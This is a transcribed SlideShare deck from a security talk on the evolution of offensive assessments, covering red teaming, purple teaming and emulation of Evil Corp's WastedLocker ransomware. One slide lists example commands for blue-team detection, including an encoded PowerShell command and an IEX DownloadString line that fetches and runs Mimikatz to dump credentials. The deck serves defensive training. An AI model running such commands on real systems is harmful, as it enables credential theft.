SlideShare ist ein Scribd-Unternehmen logo
1 von 37
Downloaden Sie, um offline zu lesen
@brysonbort
@jorgeorchilles
EVOLUTION OF OFFENSIVE
ASSESSMENTS
Evolution of
Offensive Security
@brysonbort
@jorgeorchilles
@brysonbort
@brysonbort
@jorgeorchilles
T1033 - System Owner/User Discovery
● Chief Technology Officer - SCYTHE
● Purple Team Exercise Framework (PTEF)
● C2 Matrix Co-Creator
● 10 years @ Citi leading offensive security team
● Certified SANS Instructor: SEC560, SEC504
● Author SEC564: Red Team Exercises and Adversary Emulation
● CVSSv3.1 Working Group Voting Member
● GFMA: Threat-Led Pentest Framework
● ISSA Fellow; NSI Technologist Fellow
3
@brysonbort
@jorgeorchilles
Evolution of Offensive Security
https://www.scythe.io/library/scythes-ethical-hacking-maturity-model
4
● Based on various organization’s experience
● Not a step-by-step guide, but could serve as a baseline for improvement
● You can skip steps based on business requirements and goals
● Every organization is different
● Continuous improvement should not halt previous assessment types
@brysonbort
@jorgeorchilles
A Long, Long, Long Time Ago
5
1992 - First commercial firewall
2000 +/- - Firewalls are “common”
Networks are flat
Remember Windows 95 / NT?
What was manual:
● Vulnerabilities in internet facing
services (T1190)
● Abusing internet-facing
authentication mechanisms
(T1133, T1078)
@brysonbort
@jorgeorchilles
Vulnerability Assessment
6
Vulnerabilities in internet facing
services (T1190)
Abusing internet-facing
authentication mechanisms (T1133,
T1078)
+
Severity
@brysonbort
@jorgeorchilles
Penetration Testing
7
NOW with 100%
MORE
EXPLOITATION
(and fire)
@brysonbort
@jorgeorchilles
Attack Chain
8
RECON
Access
Post-Access
@brysonbort
@jorgeorchilles
General Business Value
9
Business Value
@brysonbort
@jorgeorchilles 10
Exploitation in MITRE ATT&CK
6 techniques w/“exploit” (out of 184)
“Initial Access” - 9 Techniques
@brysonbort
@jorgeorchilles
To summarize
11
Access
@brysonbort
@jorgeorchilles
Cyber Defense Matrix
12
https://cyberdefensematrix.com/
FOLLOW @sounilyu
@brysonbort
@jorgeorchilles
Red Team
13
Goal:
● Test and measure people, process, and technology
● Make Blue Team better
● Assure business
RECON
Access
Post-Access
@brysonbort
@jorgeorchilles
Red Team: Access
1. Exploitable vulnerabilities in internet
facing services (T1190)
2. Abusing internet-facing authentication
mechanisms (T1133, T1078)
3. Phishing for malware execution (T1192,
T1193, T1194; phishing for credentials is
really just #2 above)
4. Gaining physical access to a network and
connecting a rogue device (T1200,
T1091)
5. Supply Chain Attacks (T1195, T1199)
14
https://medium.com/@malcomvetter/how-we-breached-your-network-755e40f52d85
@brysonbort
@jorgeorchilles
Red Team: Assumed Breach
15
RECON
Access
Post-Access
Business Value
@brysonbort
@jorgeorchilles
Red Team: Coverage
16
@brysonbort
@jorgeorchilles
Toward a Purple Team
@brysonbort
@jorgeorchilles
Purple Team Exercises
18
● Virtual, functional team where teams work together to measure and improve
defensive security posture (people, process, and technology)
○ CTI provides threat actor with capability, intent, and opportunity to attack
○ Red Team creates adversary emulation plan
○ Tabletop discussion with defenders about the attacker tactics, techniques,
and procedures (TTPs) and expected defenses
○ Emulation of each adversary behavior (TTPs)
○ Blue Team looks for indicators of behavior and/or improvement opportunities
○ Red and Blue work together to create remediation action plan
○ Repeat for next set of TTPs
@brysonbort
@jorgeorchilles
Blue Team
19
● Log
○ Relevant Events
○ Locally
○ Central Log Aggregator
● Alert
○ Severity
● Respond
○ Process
○ People
○ Automation
● Definition:
○ Defenders in an organization entrusted with
identifying and remediating attacks.
○ Generally associated with Security
Operations Center or Managed Security
Service Provider (MSSP), Hunt Team,
Incident Response, and Digital Forensics,
Managed Detection and Response (MDR).
○ Really, it is everyone's responsibility!
● Goal:
○ Identify, contain, eradicate attacks
@brysonbort
@jorgeorchilles
Single TTP?
● What is the expected Blue Team log, alert, and/or response from:
○ whoami - T1033; T1059.003
○ ipconfig - T1016; T1059.003
○ powershell whoami - T1033; T1059.001
○ powershell -exec bypass -nop -enc dwBoAG8AYQBtAGkA - T1033; T1132.001; T1059.001
○ powershell "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}');
Invoke-Mimikatz -DumpCreds" - T1003; T1059.001;
● Each procedure can, and most likely will, include multiple TTPs
● Adversary is not going to just perform the one TTP
● Let’s chain these TTPs together to create an attack chain
20
@brysonbort
@jorgeorchilles
Adversary Emulation
● Definition:
○ A type of Red Team exercise where the Red Team emulates how an adversary operates,
following the same tactics, techniques, and procedures (TTPs), with a specific objective similar
to those of realistic threats or adversaries.
○ Leverage Cyber Threat Intelligence to emulate an attacker likely to attack the organization
● Goal:
○ Emulate an adversary attack chain or scenario
○ Understand organization’s preparedness if under a real, sophisticated attack
● Effort:
○ Manual
● Customer:
○ Entire organization
21
https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
@brysonbort
@jorgeorchilles
#ThreatThursday
● Choose an adversary
○ Introduce Adversary
○ Consume CTI and map to MITRE ATT&CK w/Navigator Layer
○ Create Adversary Emulation Plan
○ Share the plan on SCYTHE Community Threat Github:
https://github.com/scythe-io/community-threats/
○ Emulate Adversary with video
○ How to defend against adversary
● All free for the community: https://www.scythe.io/threatthursday
22
@brysonbort
@jorgeorchilles
For example… Garmin - I see you #RedTeamFit
● July 22 - 29, 2020
● GarminConnect, FlyGarmin, all down ->
● Evil Corp using WastedLocker
23
https://techcrunch.com/2020/07/25/garmin-outage-ransomware-sources/
@brysonbort
@jorgeorchilles
Ugh… Ransomware? Boring! But wait… $$
● Get access to a target system or network (targeted or opportunist)
● Encrypt files - 3 methods:
a. Read the file, create an encrypted version of the file, replace the original file with the
encrypted one
b. Use raw disk access for encryption
c. Open the file, encrypt the contents and save the file (no file deletion or creation)
● Steal the files? Sometimes
● Download a ransom note asking for payment in crypto or else!!!
● Get PAID!!! $$$ ฿฿฿ ₿₿₿
24
@brysonbort
@jorgeorchilles
Evil Corp
● SocGholish is delivered to the victim in a zipped file via compromised
legitimate websites
● Zip file with malicious JavaScript, masquerading as a browser update
● A second JavaScript file profiles the computer and uses PowerShell to
download additional discovery related PowerShell scripts
● Once the attackers gain network access, they use PS to drop a Cobalt Strike
beacon to leverage living-off-the-land tools to steal credentials, escalate
privileges, and move across the network
● Then they deploy WastedLocker malware on multiple computers
25
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
@brysonbort
@jorgeorchilles
Evil Corp
● SocGholish is delivered to the victim in a zipped file via compromised
legitimate websites
● Zip file with malicious JavaScript, masquerading as a browser update
● A second JavaScript file profiles the computer and uses PowerShell to
download additional discovery related PowerShell scripts
● Once the attackers gain network access, they use PS to drop a Cobalt Strike
beacon to leverage living-off-the-land tools to steal credentials, escalate
privileges, and move across the network
● Then they deploy WastedLocker malware on multiple computers
26
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us
https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/
Thanks @bryceabdo
@brysonbort
@jorgeorchilles
ATT&CK Navigator
27
● No MITRE ATT&CK Mapping for
Evil Corp or WastedLocker
● Manually extracted TTPs from
Cyber Threat Intelligence
● Created MITRE ATT&CK
Navigator Layer:
https://github.com/scythe-io/community-threats/blob/m
aster/EvilCorp/EvilCorp-WastedLocker_layer.json
@brysonbort
@jorgeorchilles
Emulating Ransomware?
● Is emulating ransomware even possible?
● Of course it is!
● The secret is to not encrypt or destroy
production data.
● Instead create new files before emulating
typical ransomware steps of encrypting,
exfiltrating, and obtaining a ransom note.
● This method ensures no data is ever at risk
of being encrypted, destroyed, or leaked.
28
@brysonbort
@jorgeorchilles
Wasted Locker
29
https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/
@brysonbort
@jorgeorchilles
SHOW VALUE!!!!
● That is what we are here for… providing
business value!
● Use VECTR to propose your Adversary
Emulation Plan
● Track each engagement, each improvement,
each blue team and red team win!
● Show improvement over time
● This will make you part of a Program
including people, process, and technology
30
@brysonbort
@jorgeorchilles
Attack Tools: C2 Matrix
● Collaborative Evaluation
● Google Sheet of C2s
○ 50+ frameworks
● www.thec2matrix.com
● FOLLOW @C2_Matrix
● SANS Slingshot
31
@brysonbort
@jorgeorchilles
Attack Infrastructure with RedELK
32
● RedELK - centralized
logging for Red Team
and White Cell
● Also amazing graph for
this talk ->>
● https://github.com/outflan
knl/RedELK/
● Created by
Marc/Outflank:
○ @MarcOverIP
○ @OutflankNL
@brysonbort
@jorgeorchilles
Other considerations
● It's okay to deviate from plan to accomplish objective
● TTPs from MITRE ATT&CK are dated
○ Must be seen in the wild first; they can be years old
● Security tools/processes make some TTPs very difficult to pull off
○ This is okay, document the good and the bad
○ Give credit when and where due
● Avoiding Heartbeat Detection - 30 mins seems to be current magic #
● Everything done here today was with free tools
○ You may want to consider enterprise tools, for your enterprise.
33
@brysonbort
@jorgeorchilles
Bonus Features: Caldera
FREE!
https://github.com/mitre/caldera
https://caldera.readthedocs.io/en/latest/
34
@brysonbort
@jorgeorchilles
Shameless Plugs
● Hands-On Purple Team Workshop - October 15, October 29, November 12
○ Sign up: http://scythe.io/workshops
● SEC564 Live Online - https://sans.org/sec564
○ Singapore - October 19-22
○ HackFest - November 16-17
● RoundUp on Adversary Emulation - October 22:
○ https://wildwesthackinfest.com/the-roundup/
● Purple Team Summit - November 13
○ Free Workshops on November 12
○ CFP: https://www.scythe.io/purple-team-summit
35
@brysonbort
@jorgeorchilles
References
36
● Ethical Hacking Maturity Model:
https://www.scythe.io/library/scythes-ethical-hacking-maturity-model
● Definitions: https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
● Cyber Defense Matrix: https://cyberdefensematrix.com/
● Purple Team Exercise Framework: https://www.scythe.io/ptef
● #ThreatThursday: https://www.scythe.io/threatthursday
● C2 Matrix: https://thec2matrix.com https://howto.thec2matrix.com
● RedELK: https://github.com/outflanknl/RedELK/
● VECTR: https://vectr.io/
● SCYTHE emulation plans: https://github.com/scythe-io/community-threats/
● Caldera: https://github.com/mitre/caldera
@brysonbort
@jorgeorchilles
@brysonbort
@JorgeOrchilles
Thank You!
Any questions?
37

Weitere ähnliche Inhalte

Was ist angesagt?

Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Jorge Orchilles
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Jorge Orchilles
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Jorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamerJorge Orchilles
 
SCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzSCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzJorge Orchilles
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesJorge Orchilles
 
KringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityKringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityJorge Orchilles
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Jorge Orchilles
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Jorge Orchilles
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixJorge Orchilles
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpConJorge Orchilles
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementJoe Vest
 
Red team and blue team in ethical hacking
Red team and blue team in ethical hackingRed team and blue team in ethical hacking
Red team and blue team in ethical hackingVikram Khanna
 
The Risks of YOLOing-2.pdf
The Risks of YOLOing-2.pdfThe Risks of YOLOing-2.pdf
The Risks of YOLOing-2.pdfHacken
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsFaithWestdorp
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkLeszek Mi?
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE - ATT&CKcon
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE - ATT&CKcon
 

Was ist angesagt? (20)

Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29
 
Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020Adversary Emulation - Red Team Village - Mayhem 2020
Adversary Emulation - Red Team Village - Mayhem 2020
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
So you want to be a red teamer
So you want to be a red teamerSo you want to be a red teamer
So you want to be a red teamer
 
SCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzSCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim Schulz
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation ExercisesPurple Team - Work it out: Organizing Effective Adversary Emulation Exercises
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
 
KringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityKringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive Security
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
 
Adversary Emulation and the C2 Matrix
Adversary Emulation and the C2 MatrixAdversary Emulation and the C2 Matrix
Adversary Emulation and the C2 Matrix
 
Adversary Emulation - DerpCon
Adversary Emulation - DerpConAdversary Emulation - DerpCon
Adversary Emulation - DerpCon
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team EngagementUsing IOCs to Design and Control Threat Activities During a Red Team Engagement
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
 
Red Team Framework
Red Team FrameworkRed Team Framework
Red Team Framework
 
Red team and blue team in ethical hacking
Red team and blue team in ethical hackingRed team and blue team in ethical hacking
Red team and blue team in ethical hacking
 
The Risks of YOLOing-2.pdf
The Risks of YOLOing-2.pdfThe Risks of YOLOing-2.pdf
The Risks of YOLOing-2.pdf
 
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash PluginsEmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
EmPOW: Integrating Attack Behavior Intelligence into Logstash Plugins
 
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK FrameworkSecure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
Secure 2019 - APT for Everyone - Adversary Simulations based on ATT&CK Framework
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
 
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
MITRE ATT&CKcon 2.0: Lessons in Purple Team Testing with MITRE ATT&CK; Daniel...
 

Ähnlich wie Evolution of Offensive Assessments - RootCon

Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Jennifer Burns
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestAdversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestJorge Orchilles
 
HKG18-219 - Threat Modeling for IoT
HKG18-219 - Threat Modeling for IoTHKG18-219 - Threat Modeling for IoT
HKG18-219 - Threat Modeling for IoTLinaro
 
Adversary Playbook Tactical Assessment of Protection Techniques
Adversary Playbook Tactical Assessment of Protection TechniquesAdversary Playbook Tactical Assessment of Protection Techniques
Adversary Playbook Tactical Assessment of Protection TechniquesJustin Berman
 
Jackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dJackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dAntonio Parata
 
Cyber Threat Intelligence - It's not just about the feeds
Cyber Threat Intelligence - It's not just about the feedsCyber Threat Intelligence - It's not just about the feeds
Cyber Threat Intelligence - It's not just about the feedsIain Dickson
 
Ciso Academy 3-10-2019
Ciso Academy 3-10-2019Ciso Academy 3-10-2019
Ciso Academy 3-10-2019Tom D'Aquino
 
Getting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionGetting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionJoe McCray
 
Security Champions - Introduce them in your Organisation
Security Champions - Introduce them in your OrganisationSecurity Champions - Introduce them in your Organisation
Security Champions - Introduce them in your OrganisationIves Laaf
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 lokeshpidawekar
 
CodeMotion tel aviv 2015 - burning marshmallows
CodeMotion tel aviv 2015 - burning marshmallowsCodeMotion tel aviv 2015 - burning marshmallows
CodeMotion tel aviv 2015 - burning marshmallowsRon Munitz
 
International Cooperative: APT Hunting
International Cooperative: APT HuntingInternational Cooperative: APT Hunting
International Cooperative: APT HuntingJoshua Lawton, MBA
 
earning by s/doing/h4ck1ng/ - Our experience learning application security th...
earning by s/doing/h4ck1ng/ - Our experience learning application security th...earning by s/doing/h4ck1ng/ - Our experience learning application security th...
earning by s/doing/h4ck1ng/ - Our experience learning application security th...NECST Lab @ Politecnico di Milano
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest Haydn Johnson
 
MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows Ron Munitz
 
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Mender.io
 
Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Mender.io
 
Agile Secure Development
Agile Secure DevelopmentAgile Secure Development
Agile Secure DevelopmentBosnia Agile
 
How I Learnt hacking in High School - BSidesLV - 2015
How I Learnt hacking in High School - BSidesLV - 2015How I Learnt hacking in High School - BSidesLV - 2015
How I Learnt hacking in High School - BSidesLV - 2015lokeshpidawekar
 
Blockade.io : One Click Browser Defense
Blockade.io : One Click Browser DefenseBlockade.io : One Click Browser Defense
Blockade.io : One Click Browser DefenseRiskIQ, Inc.
 

Ähnlich wie Evolution of Offensive Assessments - RootCon (20)

Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
Using ATT&CK® for Containers to Level Up your Cloud Defenses - Jen Burns, fwd...
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestAdversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
 
HKG18-219 - Threat Modeling for IoT
HKG18-219 - Threat Modeling for IoTHKG18-219 - Threat Modeling for IoT
HKG18-219 - Threat Modeling for IoT
 
Adversary Playbook Tactical Assessment of Protection Techniques
Adversary Playbook Tactical Assessment of Protection TechniquesAdversary Playbook Tactical Assessment of Protection Techniques
Adversary Playbook Tactical Assessment of Protection Techniques
 
Jackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.dJackpot! sbancare un atm con ploutus.d
Jackpot! sbancare un atm con ploutus.d
 
Cyber Threat Intelligence - It's not just about the feeds
Cyber Threat Intelligence - It's not just about the feedsCyber Threat Intelligence - It's not just about the feeds
Cyber Threat Intelligence - It's not just about the feeds
 
Ciso Academy 3-10-2019
Ciso Academy 3-10-2019Ciso Academy 3-10-2019
Ciso Academy 3-10-2019
 
Getting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking CompetitionGetting ready for a Capture The Flag Hacking Competition
Getting ready for a Capture The Flag Hacking Competition
 
Security Champions - Introduce them in your Organisation
Security Champions - Introduce them in your OrganisationSecurity Champions - Introduce them in your Organisation
Security Champions - Introduce them in your Organisation
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015 Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
 
CodeMotion tel aviv 2015 - burning marshmallows
CodeMotion tel aviv 2015 - burning marshmallowsCodeMotion tel aviv 2015 - burning marshmallows
CodeMotion tel aviv 2015 - burning marshmallows
 
International Cooperative: APT Hunting
International Cooperative: APT HuntingInternational Cooperative: APT Hunting
International Cooperative: APT Hunting
 
earning by s/doing/h4ck1ng/ - Our experience learning application security th...
earning by s/doing/h4ck1ng/ - Our experience learning application security th...earning by s/doing/h4ck1ng/ - Our experience learning application security th...
earning by s/doing/h4ck1ng/ - Our experience learning application security th...
 
Blue team reboot - HackFest
Blue team reboot - HackFest Blue team reboot - HackFest
Blue team reboot - HackFest
 
MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows MobSecCon 2015 - Burning Marshmallows
MobSecCon 2015 - Burning Marshmallows
 
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
Linux IOT Botnet Wars and the Lack of Basic Security Hardening - OSCON 2018
 
Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018Linux IoT Botnet Wars - ESC Boston 2018
Linux IoT Botnet Wars - ESC Boston 2018
 
Agile Secure Development
Agile Secure DevelopmentAgile Secure Development
Agile Secure Development
 
How I Learnt hacking in High School - BSidesLV - 2015
How I Learnt hacking in High School - BSidesLV - 2015How I Learnt hacking in High School - BSidesLV - 2015
How I Learnt hacking in High School - BSidesLV - 2015
 
Blockade.io : One Click Browser Defense
Blockade.io : One Click Browser DefenseBlockade.io : One Click Browser Defense
Blockade.io : One Click Browser Defense
 

Mehr von Jorge Orchilles

C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020Jorge Orchilles
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixJorge Orchilles
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Jorge Orchilles
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksJorge Orchilles
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsJorge Orchilles
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Jorge Orchilles
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationJorge Orchilles
 
Emerging Threats to Infrastructure
Emerging Threats to InfrastructureEmerging Threats to Infrastructure
Emerging Threats to InfrastructureJorge Orchilles
 

Mehr von Jorge Orchilles (9)

C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 Matrix
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control Frameworks
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 Apps
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA Presentation
 
